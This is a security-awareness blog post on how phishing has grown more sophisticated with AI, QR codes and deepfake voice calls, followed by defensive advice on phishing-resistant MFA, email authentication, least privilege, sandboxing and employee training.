Liên hệ
22/10/2025
Bình luận(0)In the past year, phishing has evolved from clumsy, easy-to-detect mass spam emails into a more sophisticated and targeted AI-powered cyber weapon. From QR-code scams to voice deepfakes and AI-crafted emails that sound eerily authentic, phishing attacks has evolved smarter, faster, and far more dangerous.
But why is phishing suddenly everywhere, and what can organizations do to stay ahead of the curve and protect themselves?
- The Evolution of Deception.
Back in its early days, phishing emails were easy to spot, riddled with spelling mistakes, suspicious links and mainly from senders that are half-way across the globe. Fast forward to today, attackers are incorporating Artificial Intelligence (AI) to create AI-generated messages, spoofed cloud platforms, and real corporate tone of voice to bypass even the most vigilant employees.
Take the Microsoft 365 credential theft campaign that surfaced this year. Attackers embedded fake login pages inside HTML attachments, but the emails looked like genuine Microsoft alerts, even referencing the recipient’s department. Or the QR-code phishing trend, where employees scanned QR codes from printed posters or parking lot flyers, unknowingly landing on credential-harvesting sites.
And then there’s the deepfake voice scam in the UK, where a company lost over $240,000 after an employee received a phone call that sounded exactly like their CEO, instructing a “confidential transfer.”
These aren’t isolated incidents, but rather, they’re signs of a phishing renaissance, powered by artificial intelligence and human psychology.
Here is our analysis on what creates the revival of phishing attacks:
- AI supercharged social engineering.
Security vendors and Microsoft observed attackers using LLMs to craft highly convincing, context-aware phishing emails and to obfuscate payloads, increasing click likelihood and helping campaigns evade signatures. It has been proven that AI-assisted phishing is markedly more effective and has been used to evade detection.
- New delivery techniques went mainstream.
QR-code-based phishing, smishing (SMS), and voice-based scams (vishing / deepfake calls) rose in prevalence. It has been recorded there are large volumes of QR-linked phishing pages and millions of daily phishing artifacts.
- Better evasion & use of legitimate services.
Attackers embed malicious content inside legitimate file types (SVG, HTML attachments), abuse OAuth flows, or host credential collection on real cloud services to bypass filters. Reports show rising rates of attacks that evade native email defences.
- Data leaks + Remote work = Richer targeting.
Large breaches and aggregated personal data make personalization trivial. Combine that with remote-first communications (heavy email/Slack use) and you get more effective social engineering.
The result? A 400% increase in phishing incidents reported across several industries in the last 12 months, from finance and logistics to healthcare and education.
All of these factors are showing no signs of stopping anytime soon, but rather they will continue to develop at a rapid pace with the integration of AI technology.
Phishing attack is no longer about tricking the careless, it’s about outsmarting the prepared.
- The New Defence Mindset.
To fight modern phishing, organizations must move beyond just “awareness training.” The new approach combines technology, behaviour, and culture.
Building the Foundation.
- Make credentials useless
Replace passwords with phishing-resistant MFA like FIDO2 keys or passkeys. When a global tech company rolled this out company-wide, it saw a 92% drop in account takeover attempts, because even if someone clicked a fake link, the attacker couldn’t get in.
- Harden email & identity posture
Protect your digital front door. Enforce SPF, DKIM, and DMARC to stop spoofed emails, and enable Safe Links or time-of-click URL scanning to catch malicious redirects.
A regional bank in Southeast Asia reduced email-based phishing by nearly half after implementing DMARC and real-time URL scanning.
- Apply least privilege + conditional access
Not everyone needs admin rights. Limit access to critical systems and require extra verification for logins from unusual devices or locations.
For example, a Singapore-based manufacturing firm now blocks risky sign-ins from outside APAC, cutting down unauthorized access attempts overnight.
- Audit third-party app connections
Attackers often sneak in through connected apps. Review OAuth consents monthly and remove outdated or unnecessary app permissions.
One logistics company discovered 60+ unused third-party integrations, some still had data access. Cleaning them up closed a silent backdoor.
Detection & prevention.
- Inspect what you can’t see
Scan every attachment, even “safe-looking” files like HTML, SVG, or PDFs in a sandbox before delivery.
Recently, a retailer caught an AI-obfuscated phishing file disguised as an invoice, thanks to sandbox detonation tools.
- Double up on link scanning
Combine your provider’s filters with multi-engine URL reputation tools. This helps detect newly registered phishing domains that slip past built-in email filters.
- Beware of QR-code traps
Phishing via QR codes (also known as “quishing”) is now a major trend. In one global campaign, employees were tricked into scanning fake parking vouchers that led to credential-harvesting pages.
To combat against these traps, deploy QR-scan warnings or automatic checks that flag suspicious redirects before users enter their details.
People & process.
- Keep training real and continuous
Forget once-a-year workshops. Run monthly phishing simulations that reflect real threats, AI-generated messages, SMS lures, even fake calendar invites.
A Singaporean SME saw employee reporting rates jump 40% after shifting to regular, scenario-based simulations.
- Coach in the moment
When someone clicks a phishing link, turn it into a teachable moment.
Show a short, just-in-time micro-lesson explaining what went wrong.
These bite-sized reminders build long-term habits far better than generic training modules.
- Prepare executive & vendor playbooks
Executives are prime targets — and a CEO scam can hit both wallets and headlines.
Create a one-page crisis playbook covering who to alert (IT, comms, legal), what to say publicly, and how to lock accounts immediately.
One regional firm avoided major PR fallout after a CEO-impersonation attempt because they rehearsed their incident plan in advance.
- The Bottom Line
Phishing isn’t going away, as it’s growing faster than ever.
Attackers are smarter, tools are cheaper, and human curiosity will always be exploitable. But with the right balance of modern authentication, layered email security, continuous awareness, and rapid response, organizations can stay vigilant and be prepared when facing one.
Phishing thrives on fear and distraction, but resilience is always built on awareness and readiness.